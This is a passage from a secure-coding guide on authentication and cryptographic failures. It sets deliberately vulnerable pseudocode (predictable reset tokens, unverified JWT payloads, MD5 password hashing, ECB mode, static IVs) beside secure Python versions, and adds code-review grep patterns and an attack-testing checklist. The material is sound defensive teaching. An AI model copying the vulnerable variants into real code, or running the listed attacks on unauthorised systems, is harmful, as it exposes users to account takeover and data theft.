        if activeSessions >= MAX_SESSIONS:
            transaction.rollback()
            return error("Too many sessions")

        createSession(user.id)
        transaction.commit()
        return success()
    catch:
        transaction.rollback()
        throw
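
The check-then-increment race can be illustrated in Python with a counter whose increment and limit check happen under one lock. This is a single-process sketch only: `LoginAttemptLimiter` is a hypothetical name, and a multi-instance deployment would still need an atomic operation in a shared store, as in the Redis example above.

```python
import threading
import time


class LoginAttemptLimiter:
    """Counts attempts per key; increment and check happen atomically."""

    def __init__(self, max_attempts=5, window_seconds=900, clock=time.monotonic):
        self._max = max_attempts
        self._window = window_seconds
        self._clock = clock
        self._lock = threading.Lock()
        self._state = {}  # key -> (count, window_start)

    def register_attempt(self, key):
        """Record one attempt; return True while the key is within the limit."""
        with self._lock:
            now = self._clock()
            count, started = self._state.get(key, (0, now))
            if now - started >= self._window:
                count, started = 0, now  # window elapsed, start over
            count += 1
            self._state[key] = (count, started)
            return count <= self._max

    def reset(self, key):
        """Clear the counter, for example after a successful login."""
        with self._lock:
            self._state.pop(key, None)
```

Because the count is incremented before the password is checked, two simultaneous requests can never both observe the same pre-increment value.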

Edge Case 2: Timing Attacks on Password Comparison

// VULNERABLE: Early return reveals password length information
function verifyPassword_vulnerable(input, stored):
    if length(input) != length(stored):
        return false  // Fast return reveals length mismatch

    for i in range(length(input)):
        if input[i] != stored[i]:
            return false  // Fast return reveals first different character

    return true

// VULNERABLE: String comparison has timing differences
function checkPassword_vulnerable(password, hash):
    computedHash = sha256(password)
    return computedHash == hash  // == operator may short-circuit

// SECURE: Constant-time comparison
function constantTimeEquals(a, b):
    if length(a) != length(b):
        // Still need length check, but make it constant-time
        b = b + repeat("\0", max(0, length(a) - length(b)))
        a = a + repeat("\0", max(0, length(b) - length(a)))

    result = 0
    for i in range(length(a)):
        result = result | (charCode(a[i]) ^ charCode(b[i]))

    return result == 0

// SECURE: Use library-provided constant-time comparison
function verifyPassword_secure(password, hashedPassword):
    // bcrypt.compare is designed to be constant-time
    return bcrypt.compare(password, hashedPassword)

// SECURE: Use crypto library's timingSafeEqual
function verifyHash(input, expected):
    inputHash = sha256(input)
    return crypto.timingSafeEqual(
        Buffer.from(inputHash, 'hex'),
        Buffer.from(expected, 'hex')
    )
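
In Python, the standard library already provides a constant-time comparison, so hand-written loops are rarely needed. The sketch below uses `hmac.compare_digest`; the helper names `constant_time_equals` and `verify_api_token` are illustrative, and the SHA-256 hashing applies to high-entropy tokens, not to passwords.

```python
import hashlib
import hmac


def constant_time_equals(a: str, b: str) -> bool:
    # Encoding to bytes lets compare_digest handle non-ASCII input as well.
    return hmac.compare_digest(a.encode("utf-8"), b.encode("utf-8"))


def verify_api_token(presented: str, stored_sha256_hex: str) -> bool:
    # Suitable for random, high-entropy tokens; passwords need a slow KDF.
    presented_hash = hashlib.sha256(presented.encode("utf-8")).hexdigest()
    return hmac.compare_digest(presented_hash, stored_sha256_hex)
```

Inputs of different lengths simply compare as unequal, so callers do not need a separate length check.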

Edge Case 3: Password Reset Token Issues

// VULNERABLE: Predictable reset token
function createResetToken_vulnerable(userId):
    token = md5(toString(userId) + toString(now()))
    expiry = now() + (60 * 60)  // 1 hour
    saveResetToken(userId, token, expiry)
    return token

// VULNERABLE: Token doesn't expire on use
function resetPassword_vulnerable(token, newPassword):
    resetRecord = getResetToken(token)
    if resetRecord and resetRecord.expiry > now():
        user = findUserById(resetRecord.userId)
        user.hashedPassword = hashPassword(newPassword)
        user.save()
        // Token not invalidated! Can be reused
        return success()
    return error("Invalid token")

// VULNERABLE: Token not invalidated on password change
function changePassword(userId, oldPassword, newPassword):
    user = findUserById(userId)
    if verifyPassword(oldPassword, user.hashedPassword):
        user.hashedPassword = hashPassword(newPassword)
        user.save()
        // Existing reset tokens still valid!
        return success()
    return error("Wrong password")

// SECURE: Complete password reset implementation
function createResetToken_secure(userId):
    // Generate cryptographically random token
    token = generateSecureRandom(32)  // 256 bits
    tokenHash = sha256(token)  // Store hash, not token
    expiry = now() + (15 * 60)  // 15 minutes

    // Invalidate any existing reset tokens
    deleteResetTokensForUser(userId)

    // Store hashed token
    saveResetToken(userId, tokenHash, expiry)

    // Return plaintext token for email (store hash only)
    return token

function resetPassword_secure(token, newPassword):
    tokenHash = sha256(token)
    resetRecord = getResetTokenByHash(tokenHash)

    if not resetRecord:
        return error("Invalid token")

    if resetRecord.expiry < now():
        deleteResetToken(tokenHash)
        return error("Token expired")

    if resetRecord.used:
        return error("Token already used")

    // Validate new password strength
    validation = validatePasswordStrength(newPassword)
    if not validation.valid:
        return error(validation.errors)

    user = findUserById(resetRecord.userId)

    // Update password
    user.hashedPassword = hashPassword(newPassword)
    user.passwordChangedAt = now()
    user.save()

    // Mark token as used (or delete)
    resetRecord.used = true
    resetRecord.save()

    // Invalidate all existing sessions
    invalidateAllSessionsForUser(user.id)

    // Invalidate all refresh tokens
    revokeAllRefreshTokensForUser(user.id)

    // Send notification email
    sendPasswordChangedNotification(user.email)

    return success()
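
A compact Python sketch of the token-handling part of this flow follows. It assumes an in-memory dictionary `_reset_tokens` in place of a database table, and `create_reset_token` / `consume_reset_token` are hypothetical helper names; password validation, session invalidation, and notification are left out.

```python
import hashlib
import secrets
import time

RESET_TOKEN_TTL_SECONDS = 15 * 60

_reset_tokens = {}  # hypothetical store: sha256(token) -> record


def _hash_token(token: str) -> str:
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


def create_reset_token(user_id, now=None):
    now = time.time() if now is None else now
    # Invalidate any earlier reset tokens for this user.
    stale = [h for h, rec in _reset_tokens.items() if rec["user_id"] == user_id]
    for token_hash in stale:
        del _reset_tokens[token_hash]
    token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
    _reset_tokens[_hash_token(token)] = {
        "user_id": user_id,
        "expires_at": now + RESET_TOKEN_TTL_SECONDS,
    }
    return token  # goes into the email; only the hash is stored


def consume_reset_token(token, now=None):
    """Return the user id for a valid token, or None. The token is single-use."""
    now = time.time() if now is None else now
    record = _reset_tokens.pop(_hash_token(token), None)
    if record is None or record["expires_at"] < now:
        return None
    return record["user_id"]
```

Removing the record on first lookup makes reuse impossible even if the later password update fails, at the cost of asking the user to request a new link in that case.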

Edge Case 4: OAuth State Parameter Issues

// VULNERABLE: No state parameter - CSRF possible
function initiateOAuth_vulnerable():
    redirectUrl = OAUTH_PROVIDER_URL +
        "?client_id=" + CLIENT_ID +
        "&redirect_uri=" + CALLBACK_URL +
        "&scope=email profile"
    return redirect(redirectUrl)

// VULNERABLE: Predictable state
function initiateOAuth_weakState():
    state = toString(now())  // Predictable!
    storeState(state)
    redirectUrl = OAUTH_PROVIDER_URL +
        "?client_id=" + CLIENT_ID +
        "&state=" + state +
        "&redirect_uri=" + CALLBACK_URL
    return redirect(redirectUrl)

// VULNERABLE: State not validated on callback
function handleCallback_vulnerable(request):
    code = request.query.code
    // state parameter ignored!
    tokens = exchangeCodeForTokens(code)
    return loginWithTokens(tokens)

// VULNERABLE: State reuse possible
function handleCallback_reuseVulnerable(request):
    code = request.query.code
    state = request.query.state

    if isValidState(state):  // Just checks if it exists
        // Doesn't delete/invalidate state after use
        tokens = exchangeCodeForTokens(code)
        return loginWithTokens(tokens)

    return error("Invalid state")

// SECURE: Complete OAuth implementation
function initiateOAuth_secure(request):
    // Generate random state
    state = generateSecureRandom(32)

    // Bind state to user's session (CSRF protection)
    request.session.oauthState = state
    request.session.oauthStateCreatedAt = now()

    // Optional: include nonce for ID token validation
    nonce = generateSecureRandom(32)
    request.session.oauthNonce = nonce

    redirectUrl = OAUTH_PROVIDER_URL +
        "?client_id=" + CLIENT_ID +
        "&response_type=code" +
        "&redirect_uri=" + encodeURIComponent(CALLBACK_URL) +
        "&scope=" + encodeURIComponent("openid email profile") +
        "&state=" + state +
        "&nonce=" + nonce

    return redirect(redirectUrl)

function handleCallback_secure(request):
    code = request.query.code
    state = request.query.state
    error = request.query.error

    // Check for OAuth error
    if error:
        logOAuthError(error, request.query.error_description)
        return redirect("/login?error=oauth_failed")

    // Validate state
    if not state:
        return error("Missing state parameter")

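    storedState = request.session.oauthState
    stateCreatedAt = request.session.oauthStateCreatedAt

    // No pending OAuth flow for this session (also guards the comparison below)
    if not storedState:
        return error("Invalid state")

    // Constant-time comparison
    if not constantTimeEquals(state, storedState):
        logSecurityEvent("OAuth state mismatch", request)
        return error("Invalid state")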

    // Check state expiry (5 minutes)
    if now() - stateCreatedAt > 300:
        return error("OAuth session expired")

    // Clear state immediately (one-time use)
    delete request.session.oauthState
    delete request.session.oauthStateCreatedAt

    // Exchange code for tokens
    tokenResponse = await exchangeCodeForTokens(code, CALLBACK_URL)

    if not tokenResponse.id_token:
        return error("Missing ID token")

    // Validate ID token
    idToken = verifyIdToken(tokenResponse.id_token, {
        audience: CLIENT_ID,
        nonce: request.session.oauthNonce  // Verify nonce
    })

    delete request.session.oauthNonce

    if not idToken.valid:
        return error("Invalid ID token")

    // Create or update user
    user = findOrCreateUserFromOAuth(idToken.payload)

    // Create session with new session ID
    createAuthenticatedSession(request, user)

    return redirect("/dashboard")
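
The state handling can be sketched in Python as below. The `session` argument is assumed to be a dict-like server-side session, and `build_authorization_url` and `validate_state` are hypothetical helpers; the code exchange and ID token validation are not shown.

```python
import hmac
import secrets
import time
from urllib.parse import urlencode

STATE_MAX_AGE_SECONDS = 300


def build_authorization_url(session, authorize_url, client_id, redirect_uri):
    state = secrets.token_urlsafe(32)
    # Bind the state to this user's session for CSRF protection.
    session["oauth_state"] = state
    session["oauth_state_created_at"] = time.time()
    query = urlencode({
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "scope": "openid email profile",
        "state": state,
    })
    return authorize_url + "?" + query


def validate_state(session, returned_state, now=None):
    now = time.time() if now is None else now
    # pop() makes the state one-time use whether or not validation succeeds.
    stored = session.pop("oauth_state", None)
    created_at = session.pop("oauth_state_created_at", None)
    if not stored or not returned_state or created_at is None:
        return False
    if now - created_at > STATE_MAX_AGE_SECONDS:
        return False
    return hmac.compare_digest(stored.encode("utf-8"), returned_state.encode("utf-8"))
```

Using `urlencode` for the whole query string avoids the hand-concatenation mistakes seen in the vulnerable variants, such as an unencoded `redirect_uri`.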

Common Mistakes Section

Common Mistake 1: Reading the User ID from the Token Payload Without Verification

// VULNERABLE: Trusting unverified token payload
function getUserFromToken_vulnerable(token):
    // Decodes token WITHOUT verification
    decoded = base64Decode(token.split(".")[1])
    payload = JSON.parse(decoded)

    // Trusting the user ID from unverified payload!
    return findUserById(payload.sub)

// VULNERABLE: Verifying signature but using wrong data source
function getUser_vulnerable(request):
    token = request.headers.authorization.replace("Bearer ", "")

    // Verify the token (good)
    isValid = jwt.verify(token, secret)

    if isValid:
        // But then extract user from request body (bad!)
        userId = request.body.userId
        return findUserById(userId)

// SECURE: Always use verified payload
function getUserFromToken_secure(token):
    try:
        // Verify and decode in one operation
        decoded = jwt.verify(token, secret, { algorithms: ["HS256"] })

        // Use the verified payload, not a separate data source
        return findUserById(decoded.sub)
    catch:
        return null

// SECURE: Middleware that sets verified user
function authMiddleware(request, next):
    token = extractTokenFromRequest(request)

    if not token:
        return unauthorized()

    try:
        verified = jwt.verify(token, secret, {
            algorithms: ["HS256"],
            issuer: "myapp"
        })

        // Set user from VERIFIED token only
        request.user = {
            id: verified.sub,
            email: verified.email,
            role: verified.role
        }

        return next()
    catch:
        return unauthorized()

Common Mistake 2: Not Invalidating Old Sessions

// VULNERABLE: Password change doesn't invalidate sessions
function changePassword_vulnerable(request, oldPassword, newPassword):
    user = request.user

    if verifyPassword(oldPassword, user.hashedPassword):
        user.hashedPassword = hashPassword(newPassword)
        user.save()
        return success("Password changed")

    return error("Wrong password")
    // Existing sessions remain valid! Attacker still logged in

// VULNERABLE: Role change doesn't update session
function demoteUser_vulnerable(userId):
    user = findUserById(userId)
    user.role = "basic"
    user.save()
    // User's existing sessions still have old role!
    return success()

// SECURE: Invalidate sessions on security-sensitive changes
function changePassword_secure(request, oldPassword, newPassword):
    user = request.user

    if not verifyPassword(oldPassword, user.hashedPassword):
        return error("Wrong password")

    // Update password
    user.hashedPassword = hashPassword(newPassword)
    user.passwordChangedAt = now()
    user.save()

    // Invalidate ALL sessions except current (or including current)
    currentSessionId = request.session.id
    sessions = getAllSessionsForUser(user.id)

    for session in sessions:
        if session.id != currentSessionId:  // Keep current or invalidate all
            deleteSession(session.id)

    // Revoke all refresh tokens
    revokeAllRefreshTokensForUser(user.id)

    // Optional: Rotate the current session ID so the old identifier cannot be reused
    regenerateSession(request)

    return success("Password changed. Other sessions logged out.")

// SECURE: Track password change timestamp in tokens
function validateToken_withPasswordCheck(token):
    decoded = jwt.verify(token, secret, { algorithms: ["HS256"] })

    user = findUserById(decoded.sub)

    // Check if token was issued before password change
    if decoded.iat < user.passwordChangedAt:
        return { valid: false, error: "Password changed since token issued" }

    return { valid: true, payload: decoded }

Common Mistake 3: Misunderstanding SameSite Cookies

// VULNERABLE: Using Lax when Strict is needed
function setSessionCookie_wrongSameSite(response, sessionId):
    response.setCookie("session_id", sessionId, {
        httpOnly: true,
        secure: true,
        sameSite: "Lax"  // Allows cookie on top-level navigation
        // Attacker can CSRF via: <a href="https://bank.com/transfer?to=attacker">
    })

// VULNERABLE: Omitting SameSite (defaults vary by browser)
function setSessionCookie_noSameSite(response, sessionId):
    response.setCookie("session_id", sessionId, {
        httpOnly: true,
        secure: true
        // SameSite not specified - browser-dependent behavior
    })

// VULNERABLE: Using None without understanding implications
function setSessionCookie_sameNone(response, sessionId):
    response.setCookie("session_id", sessionId, {
        httpOnly: true,
        secure: true,
        sameSite: "None"  // Sent on ALL cross-site requests - CSRF vulnerable!
    })

// GUIDE: When to use each SameSite value

// STRICT: Most secure, use for sensitive auth cookies
// - Cookie NOT sent on any cross-site request
// - User clicking link from email to your site won't be logged in
// - Best for: Banking, admin panels, security-critical apps
function setStrictCookie(response, sessionId):
    response.setCookie("session_id", sessionId, {
        httpOnly: true,
        secure: true,
        sameSite: "Strict"
    })

// LAX: Balance of security and usability
// - Cookie sent on top-level navigation (clicking links)
// - NOT sent on cross-site POST, images, iframes
// - Good for: General user sessions where link-sharing matters
// - STILL NEED CSRF tokens for POST/PUT/DELETE endpoints!
function setLaxCookie(response, sessionId):
    response.setCookie("session_id", sessionId, {
        httpOnly: true,
        secure: true,
        sameSite: "Lax"
    })
    // Additional CSRF protection still recommended

// NONE: Only for cross-site embedding needs
// - Cookie sent on ALL requests including cross-site
// - REQUIRES Secure attribute (HTTPS only)
// - Only use for: OAuth flows, embedded widgets, intentional cross-site
function setNoneCookie_onlyWhenNeeded(response, oauthToken):
    response.setCookie("oauth_continuation", oauthToken, {
        httpOnly: true,
        secure: true,          // REQUIRED with SameSite=None
        sameSite: "None",
        maxAge: 300            // Short-lived for specific purpose
    })
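
For a concrete rendering of these attributes, the Python standard library's `http.cookies` module can build the `Set-Cookie` value (the `samesite` attribute requires Python 3.8 or later). The helper name `build_session_cookie` is an assumption for this sketch.

```python
from http.cookies import SimpleCookie


def build_session_cookie(session_id: str, same_site: str = "Strict") -> str:
    """Return the value of a Set-Cookie header for a session cookie."""
    if same_site not in ("Strict", "Lax", "None"):
        raise ValueError("same_site must be 'Strict', 'Lax', or 'None'")
    cookie = SimpleCookie()
    cookie["session_id"] = session_id
    morsel = cookie["session_id"]
    morsel["httponly"] = True   # not readable from JavaScript
    morsel["secure"] = True     # HTTPS only; mandatory with SameSite=None
    morsel["samesite"] = same_site
    morsel["path"] = "/"
    return morsel.OutputString()
```

Always setting `SameSite` explicitly avoids relying on browser-specific defaults, and rejecting unknown values catches typos such as `"strict "` early.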

Security Header Configuration

// SECURE: Complete security headers for authentication
function setSecurityHeaders(response):
    // Prevent clickjacking (don't allow embedding in frames)
    response.setHeader("X-Frame-Options", "DENY")

    // Modern clickjacking protection
    response.setHeader("Content-Security-Policy",
        "default-src 'self'; " +
        "script-src 'self'; " +
        "style-src 'self' 'unsafe-inline'; " +
        "frame-ancestors 'none'; " +
        "form-action 'self'"
    )

    // Prevent MIME type sniffing
    response.setHeader("X-Content-Type-Options", "nosniff")

    // Disable the legacy browser XSS auditor (deprecated; rely on CSP instead)
    response.setHeader("X-XSS-Protection", "0")

    // Only allow HTTPS
    response.setHeader("Strict-Transport-Security",
        "max-age=31536000; includeSubDomains; preload"
    )

    // Control referrer information
    response.setHeader("Referrer-Policy", "strict-origin-when-cross-origin")

    // Disable sensitive browser features via Permissions-Policy
    response.setHeader("Permissions-Policy",
        "geolocation=(), camera=(), microphone=(), payment=()"
    )

    // Cache control for authenticated pages
    response.setHeader("Cache-Control",
        "no-store, no-cache, must-revalidate, private"
    )
    response.setHeader("Pragma", "no-cache")
    response.setHeader("Expires", "0")

// SECURE: Login page specific headers
function setLoginPageHeaders(response):
    setSecurityHeaders(response)

    // Additional login protection
    response.setHeader("Content-Security-Policy",
        "default-src 'self'; " +
        "script-src 'self'; " +
        "style-src 'self'; " +
        "form-action 'self'; " +        // Forms only submit to same origin
        "frame-ancestors 'none'; " +     // Prevent clickjacking
        "base-uri 'self'"               // Prevent base tag injection
    )

// SECURE: API endpoint headers
function setApiHeaders(response):
    // API responses shouldn't be cached
    response.setHeader("Cache-Control", "no-store")

    // Prevent MIME type sniffing
    response.setHeader("X-Content-Type-Options", "nosniff")

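    // CORS configuration (adjust based on needs)
    response.setHeader("Access-Control-Allow-Origin",
        getAllowedOrigin())  // Not "*" for authenticated APIs!
    response.setHeader("Vary", "Origin")  // Allowed origin differs per request; keeps caches from mixing responses
    response.setHeader("Access-Control-Allow-Credentials", "true")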
    response.setHeader("Access-Control-Allow-Methods",
        "GET, POST, PUT, DELETE, OPTIONS")
    response.setHeader("Access-Control-Allow-Headers",
        "Content-Type, Authorization")

Detection Tips: How to Spot Authentication Issues

Code Review Patterns

// RED FLAGS in authentication code:

// 1. Missing algorithm specification in JWT verification
jwt.verify(token, secret)  // BAD - should specify algorithms
jwt.decode(token)          // BAD - decode doesn't verify!

// 2. Session not regenerated after login
request.session.userId = user.id  // Search for: session assignment without regenerate

// 3. Tokens in localStorage
localStorage.setItem("token"  // Search for: localStorage.*token

// 4. No HttpOnly on session cookies
setCookie("session", id)  // Search for: setCookie without httpOnly

// 5. Weak secrets
JWT_SECRET = "secret"     // Search for: SECRET.*=.*["']

// 6. No expiration
jwt.sign(payload, secret)  // Without expiresIn

// 7. Password comparison without constant-time
if password == storedHash  // Direct comparison

// 8. No rate limiting on login
function login(email, password)  // Check for rate limit before auth logic

// GREP patterns for security review:
// localStorage\.setItem.*token
// sessionStorage\.setItem.*token
// jwt\.decode\s*\(
// jwt\.verify\s*\([^,]+,[^,]+\s*\)  (missing options)
// sameSite.*None
// password.*==
// \.secret\s*=\s*["']
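
The grep patterns above can be wired into a small review helper. The Python sketch below applies them line by line; `RED_FLAG_PATTERNS` and `scan_source` are hypothetical names, and matches are only hints for a human reviewer because these regexes produce both false positives and false negatives.

```python
import re

# Patterns taken from the list above; the labels are illustrative.
RED_FLAG_PATTERNS = {
    "token in localStorage": re.compile(r"localStorage\.setItem.*token"),
    "token in sessionStorage": re.compile(r"sessionStorage\.setItem.*token"),
    "jwt.decode without verification": re.compile(r"jwt\.decode\s*\("),
    "jwt.verify without options": re.compile(r"jwt\.verify\s*\([^,]+,[^,]+\s*\)"),
    "SameSite=None cookie": re.compile(r"sameSite.*None"),
    "direct password comparison": re.compile(r"password.*=="),
    "hardcoded secret": re.compile(r"\.secret\s*=\s*[\"']"),
}


def scan_source(text):
    """Return (line_number, label) pairs for every red-flag match."""
    findings = []
    for line_number, line in enumerate(text.splitlines(), start=1):
        for label, pattern in RED_FLAG_PATTERNS.items():
            if pattern.search(line):
                findings.append((line_number, label))
    return findings
```

A usage example: `scan_source(open(path).read())` on each changed file in a pull request, with the findings posted as review comments rather than used as a hard gate.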

Security Testing Checklist

// Authentication security test cases:

// 1. Token manipulation tests
- [ ] Change JWT algorithm to "none" and remove signature
- [ ] Modify JWT payload (role, user ID) and check if accepted
- [ ] Use expired token
- [ ] Use token with wrong issuer/audience

// 2. Session tests
- [ ] Check if session ID changes after login
- [ ] Attempt session fixation (set session ID before login)
- [ ] Check session timeout enforcement
- [ ] Verify logout actually invalidates session

// 3. Password tests
- [ ] Test common passwords (password123, qwerty, etc.)
- [ ] Test password length limits (very long passwords)
- [ ] Check password reset token predictability
- [ ] Verify password reset invalidates old tokens

// 4. Cookie tests
- [ ] Check HttpOnly flag on session cookies
- [ ] Check Secure flag on session cookies
- [ ] Test SameSite enforcement
- [ ] Verify cookie scope (path, domain)

// 5. Rate limiting tests
- [ ] Attempt rapid login failures
- [ ] Check for account lockout
- [ ] Test rate limit bypass (different IPs, headers)

// 6. OAuth tests
- [ ] Test with missing state parameter
- [ ] Test with reused state parameter
- [ ] Check redirect_uri validation

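Security Checklist

Passwords are checked against common-password lists and breach databases.
Password hashing uses bcrypt, argon2, or scrypt with an appropriate work factor.
Session IDs are generated with a cryptographically secure random number generator.
Sessions are regenerated after authentication and privilege changes.
The JWT algorithm is specified explicitly (not inferred from the token).
The JWT "none" algorithm is explicitly rejected.
JWT secrets are strong (256 bits or more) and stored securely.
JWT access tokens are short-lived (15-30 minutes).
Refresh token rotation is implemented.
Tokens can be revoked server-side (blacklist or session binding).
Authentication cookies carry HttpOnly, Secure, and an appropriate SameSite attribute.
Tokens are stored in HttpOnly cookies, not in localStorage/sessionStorage.
Rate limiting is enforced on login endpoints.
Accounts are locked after repeated failures.
Constant-time comparison is used for password/token verification.
Password reset tokens are cryptographically random and single-use.
Changing the password invalidates existing sessions.
The OAuth state parameter is randomly generated and validated.
Security headers are configured (HSTS, CSP, X-Frame-Options, etc.).
Logout invalidates the session/tokens on the server side.
"Log out from all devices" is available.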

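Pattern 5: Cryptographic Failures

CWE References: CWE-327 (Use of a Broken or Risky Cryptographic Algorithm), CWE-328 (Reversible One-Way Hash), CWE-329 (Not Using a Random IV with CBC Mode), CWE-330 (Use of Insufficiently Random Values), CWE-331 (Insufficient Entropy), CWE-338 (Use of Cryptographically Weak Pseudo-Random Number Generator), CWE-916 (Use of Password Hash With Insufficient Computational Effort)

Priority Score: 18-20 (Frequency: 7, Severity: 9, Detectability: 4-6)

Introduction: Cryptography Is Hard, and AI Often Copies Outdated Patterns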

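Cryptographic implementations are among the most dangerous areas of security-sensitive code. Several compounding factors make AI models especially prone to generating insecure cryptographic patterns:

Why AI models generate weak cryptography:

Training data lags behind: Cryptographic best practices keep evolving. Training data contains years of outdated tutorials, Stack Overflow answers, and documentation recommending algorithms now considered broken (MD5, SHA1, DES, RC4). AI models cannot tell "valid in 2015" from "secure in 2025".
Tutorial simplification: Educational material often uses simplified cryptographic examples to teach concepts, such as MD5 for demonstration, short keys for readability, and static initialization vectors (IVs) for reproducibility. AI learns these "teaching patterns" as valid implementations.
Copy-paste prevalence: Cryptographic code is frequently copied rather than understood. Training data reflects this: the same insecure patterns appear thousands of times across repositories, reinforcing the wrong approach.
API complexity hides danger: Modern cryptographic libraries have complex APIs whose default parameters may be unsafe. AI generates code that "works" but relies on defaults, without recognizing that those defaults may lack authentication (for example, ECB mode) or use weak key derivation.
Security versus convenience: AI models optimize for code that compiles and runs. Cryptographic security usually requires extra steps (proper IV generation, authenticated modes, key derivation) that AI omits for the sake of simplicity.
Cross-language confusion: Cryptographic APIs differ widely between languages. AI mixes patterns from different ecosystems and produces hybrid code that may compile yet violates the security assumptions of both libraries.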

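Impact statistics:

29% of data breaches involve cryptographic failures (Verizon DBIR 2024)
Ranked #2 in the OWASP Top 10 2021 ("Cryptographic Failures")
62% of AI-generated code samples use MD5 or SHA1 for password hashing (2024 security research)
Cost of data breaches caused by weak encryption: $4.8 million on average (IBM Cost of a Data Breach Report 2024)
40% of applications still use flawed cryptographic algorithms in production (Veracode State of Software Security report)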

BAD Examples: Multiple Manifestations

BAD Example 1: MD5/SHA1 for Password Hashing

// VULNERABLE: MD5 for password hashing
function hashPassword(password):
    return md5(password)

// VULNERABLE: SHA1 for password storage
function storePassword(userId, password):
    hashedPassword = sha1(password)
    database.update("users", userId, {"password": hashedPassword})

// VULNERABLE: Single-round SHA256 (still too fast)
function createPasswordHash(password):
    return sha256(password)

// VULNERABLE: Unsalted hash
function verifyPassword(inputPassword, storedHash):
    return sha256(inputPassword) == storedHash

// VULNERABLE: Simple salt without proper KDF
function hashWithSalt(password, salt):
    return sha256(salt + password)

// VULNERABLE: MD5 with salt (still MD5)
function improvedHash(password):
    salt = generateRandomBytes(16)
    hash = md5(salt + password)
    return salt + ":" + hash

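Why this is dangerous:

MD5 collisions can be produced in seconds on modern hardware.
SHA1 collision attacks are practical (SHAttered attack, 2017).
Even SHA256 is far too fast for password hashing: GPUs compute billions of hashes per second.
Unsalted hashes are vulnerable to rainbow table attacks.
Simple concatenation (salt + password) does not provide adequate protection.
Password-cracking rigs can test 180 billion MD5 hashes per second.

Attack scenario: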

// Attacker steals database with unsalted MD5 password hashes
// Using hashcat on a modern GPU rig:

hashcat_speed = 180_000_000_000  // 180 billion MD5/second
common_passwords = 1_000_000_000  // 1 billion common passwords

time_to_crack_all = common_passwords / hashcat_speed
// Result: ~0.0056 seconds (about 5.6 ms) to check ALL common passwords
// against ALL hashes, because unsalted hashes share a single pass

// Even SHA256 is fast:
sha256_speed = 23_000_000_000  // 23 billion SHA256/second
// 1 billion candidates / 23 billion per second = ~0.04 seconds for the same list
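
By contrast, a deliberately slow, salted key derivation function makes each guess expensive. The Python sketch below uses `hashlib.scrypt` from the standard library (available when Python is built against OpenSSL 1.1 or later). The cost parameters and the `salt:digest` storage format are assumptions for illustration; tune them for your own hardware, or use a maintained bcrypt or argon2 library instead.

```python
import hashlib
import hmac
import os

# Assumed cost parameters (roughly 16 MiB of memory per hash); tune as needed.
SCRYPT_N = 2**14
SCRYPT_R = 8
SCRYPT_P = 1


def _scrypt(password: str, salt: bytes) -> bytes:
    return hashlib.scrypt(
        password.encode("utf-8"),
        salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32,
    )


def hash_password(password: str) -> str:
    salt = os.urandom(16)  # unique random salt per password
    return salt.hex() + ":" + _scrypt(password, salt).hex()


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split(":")
    candidate = _scrypt(password, bytes.fromhex(salt_hex))
    # Constant-time comparison of the derived keys.
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))
```

Because every stored hash has its own salt and each evaluation costs memory and time, an attacker can no longer test one candidate against the whole table in a single fast pass.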

BAD Example 2: ECB Mode Encryption

// VULNERABLE: ECB mode reveals patterns
function encryptData(plaintext, key):
    cipher = createCipher("AES", key, mode = "ECB")
    return cipher.encrypt(plaintext)

// VULNERABLE: Default mode may be ECB in some libraries
function simpleEncrypt(data, key):
    cipher = AES.new(key)  // Some libraries default to ECB!
    return cipher.encrypt(padData(data))

// VULNERABLE: Explicit ECB for "simplicity"
function encryptUserData(userData, encryptionKey):
    algorithm = "AES/ECB/PKCS5Padding"  // Java-style
    cipher = Cipher.getInstance(algorithm)
    cipher.init(ENCRYPT_MODE, encryptionKey)
    return cipher.doFinal(userData)

// VULNERABLE: Assuming any AES is secure
function protectSensitiveData(data, key):
    // "AES is strong encryption" - but ECB mode is not
    encryptor = AESEncryptor(key, mode = "ECB")
    return encryptor.encrypt(data)

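Why this is dangerous:

ECB encrypts identical plaintext blocks into identical ciphertext blocks.
Patterns in the plaintext survive in the ciphertext.
Famous example: an ECB-encrypted image still shows the outline of the original.
No semantic security: an attacker learns information about the plaintext structure.
Block manipulation attacks are possible (swapping, deleting, or duplicating blocks).

Visual demonstration: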

// Original image (bitmap of a penguin):
// ████████████████
// ██    ████    ██
// ██  ██████  ██
// ██████████████
// ████    ████████
// ████████████████

// After ECB encryption:
// ????????????????   ← Still shows penguin shape!
// ??    ????    ??   ← Identical colors → identical ciphertext
// ??  ??????  ??
// ??????????????
// ????    ????????
// ????????????????

// After CBC/GCM encryption:
// ????????????????   ← Random appearance
// ????????????????   ← No pattern visible
// ????????????????
// ????????????????
// ????????????????
// ????????????????

BAD Example 3: Static IV / Nonce

// VULNERABLE: Hardcoded IV
STATIC_IV = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])

function encryptMessage(plaintext, key):
    cipher = AES.new(key, AES.MODE_CBC, iv = STATIC_IV)
    return cipher.encrypt(padData(plaintext))

// VULNERABLE: Same IV for all encryptions
class Encryptor:
    IV = generateRandomBytes(16)  // Generated ONCE at startup

    function encrypt(data, key):
        cipher = createCipher("AES-CBC", key, this.IV)
        return cipher.encrypt(data)

// VULNERABLE: Counter nonce that restarts from zero
nonce_counter = 0  // Not persisted: resets on every restart or new instance
function encryptWithNonce(plaintext, key):
    nonce_counter = nonce_counter + 1
    nonce = intToBytes(nonce_counter, 12)  // Repeats under the same key after a restart!
    return AES_GCM_encrypt(key, nonce, plaintext)

// VULNERABLE: IV derived from predictable data
function encryptRecord(userId, data, key):
    iv = sha256(toString(userId))[:16]  // Same IV for same user!
    return AES_CBC_encrypt(key, iv, data)

// VULNERABLE: Timestamp-based IV
function timeBasedEncrypt(data, key):
    iv = sha256(toString(getCurrentTimestamp()))[:16]
    return AES_CBC_encrypt(key, iv, data)
    // Problem: Collisions if encrypted in same second

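Why this is dangerous:

Same IV + same key = identical plaintexts yield identical ciphertexts (breaks semantic security).
In CBC mode: messages that share a prefix produce identical leading ciphertext blocks, revealing relationships between messages.
In CTR mode: keystream reuse exposes the XOR of the plaintexts.
In GCM mode: nonce reuse is catastrophic, since the authentication key can be recovered.
Predictable IVs enable chosen-plaintext attacks.

GCM nonce reuse attack: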

// If same nonce used twice with same key in GCM:
// Message 1: plaintext1, ciphertext1, tag1
// Message 2: plaintext2, ciphertext2, tag2

// Attacker can compute:
